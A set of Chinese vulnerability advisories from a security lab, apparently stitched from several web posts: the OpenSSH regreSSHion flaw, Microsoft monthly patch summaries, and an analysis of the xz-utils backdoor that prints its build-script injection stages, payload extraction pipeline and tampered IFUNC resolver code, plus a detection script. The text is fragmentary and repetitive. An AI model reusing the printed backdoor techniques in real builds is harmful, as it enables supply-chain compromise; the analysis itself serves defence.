天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

近日，天融信阿尔法实验室监测到国外研究团队Qualys发布了OpenSSH的一个远程代码执行漏洞CVE-2024-6387的细节及漏洞利用代码，该漏洞被命名为“regreSSHion”。

0x00 背景介绍

近日，天融信阿尔法实验室监测到国外研究团队Qualys发布了OpenSSH的一个远程代码执行漏洞CVE-2024-6387的细节及漏洞利用代码，该漏洞被命名为“regreSSHion”。建议受影响用户尽快做好自查和防护。

OpenSSH的sshd组件存在一个信号处理条件竞争漏洞CVE-2024-6387，未经身份认证的远程攻击者能够利用此漏洞以root权限执行任意代码。该漏洞是CVE-2006-5051的回归，是在OpenSSH 8.5p1版本的一次代码变更中引入的。

1、OpenSSH < 4.4p1。4.4p1之前的OpenSSH版本容易受到此信号处理程序竞争条件的影响，除非它们针对CVE-2006-5051和CVE-2008-4109进行了修补。

• 临时缓解
  

• 升级修复

https://access.redhat.com/security/cve/cve-2024-6387

https://www.openssh.com/releasenotes.html#9.8p1

0x05 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年06月12日，天融信阿尔法实验室监测到微软官方发布了06月安全更新。此次更新共修复49个漏洞（不包含2个外部分配漏洞和本月早些时候发布的7个Edge漏洞），其中1个严重漏洞、48个重要漏洞。

0x00 背景介绍

2024年06月12日，天融信阿尔法实验室监测到微软官方发布了06月安全更新。此次更新共修复49个漏洞（不包含2个外部分配漏洞和本月早些时候发布的7个Edge漏洞），其中1个严重漏洞(Critical)、48个重要漏洞(Important)。其中权限提升漏洞24个、远程代码执行漏洞18个、信息泄露漏洞3个、拒绝服务漏洞4个。

• 漏洞利用可能性较大的漏洞

• CVE-2024-30080：Microsoft消息队列(MSMQ)远程代码执行漏洞
  

• CVE-2024-30082、CVE-2024-30086、CVE-2024-30087、CVE-2024-30091：Windows Win32k本地权限提升漏洞
  

• CVE-2024-30084、CVE-2024-35250：Windows内核模式驱动本地权限提升漏洞
  

• CVE-2024-30085：Windows Cloud Files微过滤器驱动本地权限提升漏洞
  

• CVE-2024-30088、CVE-2024-30099：Windows Kernel本地权限提升漏洞
  

• CVE-2024-30089：Windows流服务本地权限提升漏洞
  

• 高评分漏洞

• CVE-2024-30064：Windows Kernel本地权限提升漏洞
  

• CVE-2024-30068：Windows Kernel本地权限提升漏洞
  

• CVE-2024-30078：Windows Wi-Fi驱动远程代码执行漏洞
  

• CVE-2024-30097：Microsoft语音应用编程接口(SAPI)远程代码执行漏洞
  

• CVE-2024-30103：Microsoft Outlook远程代码执行漏洞
  

该漏洞是Microsoft Outlook中的不允许输入的不完整列表漏洞（CWE-184）。攻击者必须使用有效的Exchange用户凭据进行身份认证。成功利用此漏洞的攻击者可以绕过Outlook注册表阻止列表并创建恶意DLL文件。可通过预览窗格进行攻击。

• CVE-2024-35249：Microsoft Dynamics 365 Business Central远程代码执行漏洞

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年05月15日，天融信阿尔法实验室监测到微软官方发布了05月安全更新。此次更新共修复60个漏洞（不包含2个外部分配漏洞和本月早些时候发布的6个Edge漏洞），其中1个严重漏洞、57个重要漏洞、1个中危漏洞、1个低危漏洞。

0x00 背景介绍

2024年05月15日，天融信阿尔法实验室监测到微软官方发布了05月安全更新。此次更新共修复60个漏洞（不包含2个外部分配漏洞和本月早些时候发布的6个Edge漏洞），其中1个严重漏洞(Critical)、57个重要漏洞(Important)、1个中危漏洞(Moderate)、1个低危漏洞(Low)。其中权限提升漏洞17个、远程代码执行漏洞25个、信息泄露漏洞7个、拒绝服务漏洞3个、欺骗漏洞5个、安全功能绕过漏洞2个、篡改漏洞1个。

本次微软安全更新涉及组件包括：Windows MSHTML Platform、Windows DWM Core Library、Windows Common Log File System Driver、Windows Cloud Files Mini Filter Driver、Windows Win32K、Microsoft Office SharePoint、Windows Mobile Broadband、Windows Routing and Remote Access Service (RRAS)、Windows Hyper-V等多个产品和组件。

• 在野利用和公开披露漏洞

• CVE-2024-30040：Windows MSHTML平台安全功能绕过漏洞

• CVE-2024-30051：Windows DWM核心库本地权限提升漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-29996、CVE-2024-30025、CVE-2024-30037：Windows通用日志文件系统驱动本地权限提升漏洞
  

• CVE-2024-30032、CVE-2024-30035：Windows DWM核心库本地权限提升漏洞
  

• CVE-2024-30034：Windows Cloud Files微过滤器驱动信息泄露漏洞
  

• CVE-2024-30038、CVE-2024-30049：Windows Win32k本地权限提升漏洞
  

• CVE-2024-30044：Microsoft SharePoint Server远程代码执行漏洞
  

• CVE-2024-30050：Windows网络标记(MOTW)安全功能绕过漏洞
  

• 高评分漏洞

• CVE-2024-30006：Microsoft SQL Server的WDAC OLE DB提供程序远程代码执行漏洞
  

• CVE-2024-30007：Microsoft Brokering文件系统本地权限提升漏洞
  

• CVE-2024-30009：Windows路由和远程访问服务(RRAS)远程代码执行漏洞
  

• CVE-2024-30010：Windows Hyper-V远程代码执行漏洞
  

• CVE-2024-30017：Windows Hyper-V远程代码执行漏洞
  

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

2024年04月10日，天融信阿尔法实验室监测到微软官方发布了04月安全更新。此次更新共修复149个漏洞（不包含3个外部分配漏洞和本月早些时候发布的3个Edge漏洞），其中3个严重漏洞、142个重要漏洞、3个中危漏洞、1个低危漏洞。

0x00 背景介绍

2024年04月10日，天融信阿尔法实验室监测到微软官方发布了04月安全更新。此次更新共修复149个漏洞（不包含3个外部分配漏洞和本月早些时候发布的3个Edge漏洞），其中3个严重漏洞(Critical)、142个重要漏洞(Important)、3个中危漏洞(Moderate)、1个低危漏洞(Low)。其中权限提升漏洞31个、远程代码执行漏洞68个、信息泄露漏洞12个、拒绝服务漏洞7个、欺骗漏洞5个、安全功能绕过漏洞26个。

• 在野利用和公开披露漏洞

• CVE-2024-26234：Proxy驱动欺骗漏洞

• 漏洞利用可能性较大的漏洞

• CVE-2024-26158：Microsoft安装服务本地权限提升漏洞
  

• CVE-2024-26209：Microsoft本地安全认证子系统服务(LSASS)信息泄露漏洞
  

• CVE-2024-26211：Windows远程访问连接管理器本地权限提升漏洞
  

• CVE-2024-26212：DHCP Server服务拒绝服务漏洞
  

• CVE-2024-26218：Windows Kernel本地权限提升漏洞
  

• CVE-2024-26230、CVE-2024-26239：Windows Telephony Server本地权限提升漏洞
  

• CVE-2024-26241：Windows Win32k本地权限提升漏洞
  

• CVE-2024-26256：libarchive远程代码执行漏洞
  

• CVE-2024-28903、CVE-2024-28921：Secure Boot安全功能绕过漏洞

• CVE-2024-29056：Windows认证权限提升漏洞

• CVE-2024-29988：SmartScreen提示安全功能绕过漏洞

该漏洞是SmartScreen提示中的保护机制失效漏洞（CWE-693），未经身份认证的远程攻击者通过向受害者发送特制的文件并诱骗受害者运行该特制文件来利用此漏洞，成功利用此漏洞可以绕过"网页标记"（Mark of the Web，MotW）功能，从而在目标系统上执行恶意代码。

该漏洞与微软2024年2月补丁日修复的在野利用漏洞CVE-2024-21412相似，微软目前并未将其列为已被利用的漏洞，但有情报显示该漏洞存在在野利用。

• 高评分漏洞

• CVE-2024-29990：Microsoft Azure Kubernetes服务机密容器特权提升漏洞
  

• CVE-2024-26179、CVE-2024-26200、CVE-2024-26205：Windows路由和远程访问服务远程代码执行漏洞
  

• CVE-2024-28906：Microsoft SQL Server的OLE DB驱动远程代码执行漏洞
  

• CVE-2024-28929：Microsoft SQL Server的ODBC驱动远程代码执行漏洞
  

• CVE-2024-20678：Windows远程过程调用运行时远程代码执行漏洞
  

该漏洞是Windows远程过程调用运行时中的类型混淆漏洞（CWE-843），经过任何身份认证的远程攻击者通过向RPC服务器发送特制的RPC调用来利用此漏洞，这可能会导致攻击者在服务器端以与RPC服务相同的权限执行远程代码。

• Windows自动更新

1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。

2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”->“系统和安全”->“Windows更新”）。

3、选择“检查更新”，等待系统将自动检查并下载可用更新。

4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。

• 手动安装补丁
  

0x04 声明

天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。

天融信

阿尔法实验室

长按二维码关注我们

阅读原文

跳转微信打开

0x01 事件概述近日，微软一名软件工程师Andres Freund公开披露，其观察到liblzma库存在一些

0x01 事件概述

近日，微软一名软件工程师Andres Freund公开披露，其观察到liblzma库存在一些奇怪的现象，包括在用ssh远程登录异常及内存错误。经过分析，其确认在liblzma上游组件xz-utils中存在后门代码，后门或可导致攻击者能够在ssh登录认证前，执行攻击者指定的任意代码，可对Linux服务器安全造成严重影响。

综合情况看，这是一起开源软件供应链投毒攻击事件。攻击者伪装成开发者，借更新之名，秘密的向xz-utils中加入后门代码，导致xz-utils中的liblzma易受攻击。

OpenSSH用于SSH登录，广泛部署于基于Linux发行的操作系统中。其默认不依赖liblzma，但是部分Linux发行版会对OpenSSH进行二次开发而导致其默认加载LibSystemd，而LibSystemd默认加载liblzma。就这样，OpenSSH间接的因xz-utils的投毒而变得易受攻击，在认证前可执行攻击者发送的恶意代码。 天融信对该漏洞及相关事件的详细分析情况如下。

0x02 影响

liblzma/xz官方库遭到供应链攻击，并被恶意篡改以植入后门。xz主要功能是提供数据压缩和解压缩功能，集成了liblzma等组件。部分linux操作系统ssh的底层实现中间接引用了liblzma，常见的如Red Hat、Debian、Kali Linux、Arch Linux、SUSE、Alpine Linux。

xz-utils 分为 liblzma 和 xz 两部分。xz 是一个单文件压缩软件，采用了压缩率高的 LZMA 算法，在 Linux 中被广泛使用。liblzma 是 LZMA 算法的实现，被应用于 systemd 等多个 Linux 系统和应用软件。

xz == 5.6.0
xz == 5.6.1
liblzma== 5.6.0
liblzma== 5.6.1

当前的情况显示，该漏洞在”投毒”初期便被发现并披露，影响部分系统及服务，尚未大面积扩散。运维及管理人员仍需重视该事件，尽快检查及处置。

0x03 投毒方式

从Mail Archive（xz项目的邮件沟通记录）来看，其最早于2021年10月29日尝试向xz提交代码。

从2022年的12月30日开始，JiaT75有了独自提交代码的能力。

直到2024年2月23日时，JiaT75开始向xz投递了带有恶意载荷文件bad-3-corrupt_lzma2.xz和good-large_compressed.lzma，其自称，文件中包含了一些测试用的“随机数据”，和一些无法被解压的“损坏数据”。为了更好地隐蔽恶意载荷，其中大多数测试数据都是正常无害的。

在2024年3月20日，jia tan还在尝试向Linux内核提交代码更新功能（暂未发现直接的恶意代码），并且该代码已进入Linux-next，事发后被叫停。

如下图的debian，ID“hansjans162”和前面的ifunc提交相同。

$ git shortlog --summary --numbered --email | grep jiat0218@gmail.com273 Jia Tan <jiat0218@gmail.com>2 jiat75 <jiat0218@gmail.com>1 Jia Cheong Tan <jiat0218@gmail.com>

1、提交记录的时区信息：观察到此人有在东二时区（冬季）和东三时区（夏季）的提交记录，这与欧洲/以色列地区实行的夏令时制度相吻合，而不是一直在东八时区（中国时区）。

目前从整理出的全部信息来看，还无法确定JiaT75究竟是个人还是组织。

0x04 源代码分析

此次攻击的大致流程如下所示：

2、利用glibc的IFUNC特性，获得在sshd进程加载liblzma.so库时执行后门代码的能力。通过后门代码Hook sshd进程中RSA_public_decrypt()函数的GOT表条目。

3、攻击者通过SSH公钥登录方式，使用特定的RSA私钥连接目标机器进行身份验证。sshd进程会通过RSA_public_decrypt()函数对攻击者发送的RSA私钥进行解密，该RSA私钥中包含攻击者想要执行的payload，由此可知，本次后门可造成远程代码执行。

由于阶段三中执行的good-large_compressed.sh脚本会检查源代码目录下是否存在/debian/rules文件，可以选择debian的xz-utils源码进行编译，或者在上游xz-utils源码创建这样一个文件后，就能成功编译包含后门代码的liblzma.so库。

阶段一

在构建xz-utils的过程中，通过执行源代码根目录下的configure脚本生成Makefile文件时，会执行build-to-host.m4文件中的宏。此文件中的宏代码用于对./tests/files/bad-3-corrupt_lzma2.xz文件进行修复，解压，然后获得用于阶段二执行的脚本代码（命名为bad-3-corrupt_lzma2.sh）并执行。build-to-host.m4文件中的关键代码如下所示。

// ./m4/build-to-host.m4// 找到包含“####Hello####”内容的文件的名称gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`❯ grep -aErls "#{4}[[:alnum:]]{5}#{4}$" . 2>/dev/null./tests/files/bad-3-corrupt_lzma2.xz
// 获取xz程序的名字gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`❯ echo ./tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"xz
// 修复bad-3-corrupt_lzma2.xz文件，并对其解压，获得bad-3-corrupt_lzma2.sh脚本文件，然后执行它gl_path_map='tr "\t \-_" " \t_\-"'gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | eval 'tr "\t \-_" " \t_\-"' | xz -d 2>/dev/null

0x09(\t) --> 0x20(空格)0x20(空格) --> 0x09(\t)0x2d(-) --> 0x5f(_)0x5f(_) --> 0x2d(-)

阶段二

阶段二执行的bad-3-corrupt_lzma2.sh脚本的内容如下所示。

# bad-3-corrupt_lzma2.sh, xz-5.6.0####Hello#####†ùZ÷.hj¼eval `grep ^srcdir= config.status`if test -f ../../config.status;theneval `grep ^srcdir= ../../config.status`srcdir="../../$srcdir"fiexport i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh####World####

# 1. 解压./tests/files/good-large_compressed.lzma文件xz -dc $srcdir/tests/files/good-large_compressed.lzma# 2. 对good-large_compressed.lzma文件解压后的文件进行处理eval $i# 3. 只获取第2步结果的末尾31265字节数据tail -c +31265# 4. 对第3步结果中的一些数据进行替换tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"# 5. 解压第4步获得的正确的压缩文件xz -F raw --lzma1 -dc# 6. 从第5步的输出中获得阶段三的脚本并执行。/bin/sh

第2步对good-large_compressed.lzma文件解压后的文件进行处理，首先通过“head -c +1024 >/dev/null”命令将该文件的前1024字节数据丢弃，然后通过“head -c +2048”命令将该文件前1024字节之后的2048字节数据输出到标准输出，以此模式，不断循环，直到将所有无用数据剔除，只留下有效的数据，以待第3步继续处理。所以，good-large_compressed.lzma文件解压后的文件中的数据是无用数据与有用数据交叉分布的。

由上可知，bad-3-corrupt_lzma2.sh脚本用于解压good-large_compressed.lzma文件，然后对解压后的文件进行处理，获得另一个压缩包。对其解压后，获得阶段三执行的脚本（命名为good-large_compressed.sh）。

可以对bad-3-corrupt_lzma2.sh文件做一些修改，以独立获得good-large_compressed.sh。

# 将good-large_compressed.lzma于此脚本放于同一目录xz -dc good-large_compressed.lzma# 将标准输出重定向到good-large_compressed.sh文件中xz -F raw --lzma1 -dc 1>good-large_compressed.sh

阶段三

第一次执行的good-large_compressed.sh脚本中的主要代码如下所示。

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"C="pic_flag=\" $P\""O="^pic_flag=\" -fPIC -DPIC\"$"R="is_arch_extension_supported"x="__get_cpuid("p="good-large_compressed.lzma"U="bad-3-corrupt_lzma2.xz"eval $zrKcVq# 第一次执行此脚本时，是在源代码根目录下执行的。if test -f config.status; then    ......    eval `grep ^build=\'x86_64 config.status`    eval `grep ^enable_shared=\'yes\' config.status`    eval `grep ^enable_static=\' config.status`    eval `grep ^gl_path_map=\' config.status`    eval $zrKccj    # 查找config.status文件中是否有D["HAVE_FUNC_ATTRIBUTE_IFUNC"]=" 1"    if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then        exit 0    fi    # 查找config.h文件中是否有#define HAVE_FUNC_ATTRIBUTE_IFUNC 1    if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then        exit 0    fi    # 判断enable_shared选项的值是否为yes    if test "x$enable_shared" != "xyes";then        exit 0    fi    # 判断build选项的值中是否包含"x86_64"和"linux-gnu"    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then        exit 0    fi    ......    # 判断是否存在./debian/rules文件以及$RPM_ARCH环境变量设置为x86_64    if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then        ......        # 修改/src/liblzma/Makefile文件的内容        eval $zrKcTy        b="am__test = $U"        sed -i "/$j/i$b" src/liblzma/Makefile || true        d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`        b="am__strip_prefix = $d"        sed -i "/$w/i$b" src/liblzma/Makefile || true        b="am__dist_setup = \$(am__strip_prefix) | xz -d 2> /dev/null | \$(SHELL)"        sed -i "/$E/i$b" src/liblzma/Makefile || true        b="\$(top_srcdir)/tests/files/\$(am__test)"        s="am__test_dir=$b"        sed -i "/$Q/i$s" src/liblzma/Makefile || true        h="-Wl,--sort-section=name,-X"        if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then            h=$h",-z,now"        fi        j="liblzma_la_LDFLAGS += $h"        sed -i "/$L/i$j" src/liblzma/Makefile || true        sed -i "s/$O/$C/g" libtool || true        k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"        sed -i "s/$u/$k/" src/liblzma/Makefile || true        l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\        export top_srcdir='\$(top_srcdir)'; \\\\\n\        export CC='\$(CC)'; \\\\\n\        export DEFS='\$(DEFS)'; \\\\\n\        export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\        export INCLUDES='\$(INCLUDES)'; \\\\\n\        export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\        export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\        export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\        export CFLAGS='\$(CFLAGS)'; \\\\\n\        export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\        export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\        export libdir='\$(libdir)'; \\\\\n\        export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\        export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\        sed rpath \$(am__test_dir) | \$(am__dist_setup) > /dev/null 2>&1";        sed -i "/$m/i$l" src/liblzma/Makefile || true        eval $zrKcHD    fi......

此步骤会对当前环境进行一些检测，是否支持glibc的IFUNC特性，以及构建的可执行文件是否是x86_64架构的。除此之外，还会检测源代码项目中是否存在/debian/rules文件或$RPM_ARCH环境变量是否设置为x86_64，只有通过检测，才会修改/src/liblzma/Makefile文件的内容。所以，包含后门的xz-utils项目只能在特定环境下，才能成功构建。

am__test = bad-3-corrupt_lzma2.xzam__test_dir=$(top_srcdir)/tests/files/$(am__test)am__strip_prefix = tr "\t \-_" " \t_\-"am__dist_setup = $(am__strip_prefix) | xz -d 2>/dev/null | $(SHELL)sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
# 实际执行的命令sed rpath ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2>/dev/null

......# 第一次执行此脚本时，是在源代码根目录下执行的。if test -f config.status; then    ......# 第二次执行此脚本时，是从/src/liblzma目录下的Makefile中执行的，所以当前目录为/src/liblzma。elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then    ......    # 从good-large_compressed.lzma文件中提取liblzma_la-crc64-fast.o文件，存放在/src/liblzma目录下。    xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true    ......    cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true    V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported'    eval $yosA    # 将crc64_fast.c文件crc64_resolve()函数中调用的is_arch_extension_supported()函数替换为_is_arch_extension_supported()函数    if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \        # 在crc64_fast.c文件include "crc_x86_clmul.h"语句下添加一段代码        sed "/include \"crc_x86_clmul.h\"/a \\$V" | \        sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2> /dev/null | \        #         $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o 2> /dev/null; then        ......fi

// crc64_fast.c的修改内容，crc32_fast.c与此相似。#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))extern int _get_cpuid(int, void*, void*, void*, void*, void*);static inline bool _is_arch_extension_supported(void) {     int success = 1;     uint32_t r[4];     success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);     const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);     return success && (r[2] & ecx_mask) == ecx_mask; }#else#define _is_arch_extension_supported is_arch_extension_supported#endif
static crc64_func_type crc64_resolve(void) {    return _is_arch_extension_supported()            ? &crc64_arch_optimized : &crc64_generic;}

❯ ldd /usr/sbin/sshd | grep "liblzma"  liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007ff5218fc000)❯ ll /lib/x86_64-linux-gnu/ | grep "liblzma"-rw-r--r--  1 root root 275K 4月   8  2022 liblzma.alrwxrwxrwx  1 root root   47 4月   2 16:10 liblzma.so -> /usr/software/xz-5.6.0-0.2/lib/liblzma.so.5.6.0lrwxrwxrwx  1 root root   47 4月   3 15:24 liblzma.so.5 -> /usr/software/xz-5.6.0-0.2/lib/liblzma.so.5.6.0-rw-r--r--  1 root root 159K 4月   8  2022 liblzma.so.5.2.4

❯ time env -i LC_LANG=C LD_PRELOAD=/usr/software/xz-5.6.0-0.2/lib/liblzma.so.5.6.0 /usr/sbin/sshd -hoption requires an argument -- hOpenSSH_8.2p1 Ubuntu-4ubuntu0.11, OpenSSL 1.1.1f  31 Mar 2020usage: sshd [-46DdeiqTt] [-C connection_spec] [-c host_cert_file]            [-E log_file] [-f config_file] [-g login_grace_time]            [-h host_key_file] [-o option] [-p port] [-u len]env -i LC_LANG=C LD_PRELOAD=/usr/software/xz-5.6.0-0.2/lib/liblzma.so.5.6.0    0.19s user 0.02s system 90% cpu 0.227 total
❯ time env -i LC_LANG=C TERM=foo LD_PRELOAD=/usr/software/xz-5.6.0-0.2/lib/liblzma.so.5.6.0 /usr/sbin/sshd -hoption requires an argument -- hOpenSSH_8.2p1 Ubuntu-4ubuntu0.11, OpenSSL 1.1.1f  31 Mar 2020usage: sshd [-46DdeiqTt] [-C connection_spec] [-c host_cert_file]            [-E log_file] [-f config_file] [-g login_grace_time]            [-h host_key_file] [-o option] [-p port] [-u len]env -i LC_LANG=C TERM=foo  /usr/sbin/sshd -h  0.00s user 0.00s system 91% cpu 0.004 total

第一条命令成功加载了后门代码，第二条命令未成功加载，加载了后门代码的sshd进程的启动速度较慢。后门代码还会通过检测以下条件，判断是否执行后门代码。

1、未设置TERM、LD_DEBUG、LD_PROFILE环境变量，设置了LANG环境变量。

GNU IFUNC(GNU Indirect Function)是GNU工具链的一项功能，它允许开发人员为给定函数创建多个实现，并在运行时使用同样由开发人员编写的解析器函数进行选择。

IFUNC特性虽然为程序的性能优化和平台兼容性提供了更多的可能性，但也存在被恶意利用的风险，其主要的安全隐患包括：劫持函数、绕过安全措施、隐藏攻击载荷。

xz-utils源码中的crc64_fast.c和crc32_fast.c文件中的crc64_resolve()和crc32_resolve()函数为liblzma实现的IFUNC解析器。当加载liblzma.so共享库时，这些IFUNC解析器函数会很早就得到执行。

0x05 处置情况

用户可以通过以下命令检查系统中安装的xz-utils软件包的版本：
xz --version

通过利用如下脚本进行自查

#! /bin/bash
set -eu
# find path to liblzma used by sshdpath="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"
# does it even exist?if [ "$path" == "" ]thenecho probably not vulnerableexitfi
# check for function signatureif hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410thenecho probably vulnerableelseecho probably not vulnerablefi

若确认受影响，请将xz降级至 5.4.6 版本。

天融信脆弱性扫描与管理系统针对此漏洞的规则库更新如下图：

天融信脆弱性扫描与管理系统针对该漏洞检查结果如下图所示 ：

按照如下步骤对插件库进行升级和漏洞扫描：

1、在线自动升级，在“超级管理员”账号【系统管理】→【插件库升级】→【立即更新】→立即升级。

阅读原文

跳转微信打开

0x00 背景介绍3月29日，Openwall 邮件列表中公布了名为 XZ Utils 的流行软件包中的后门。

0x00 背景介绍

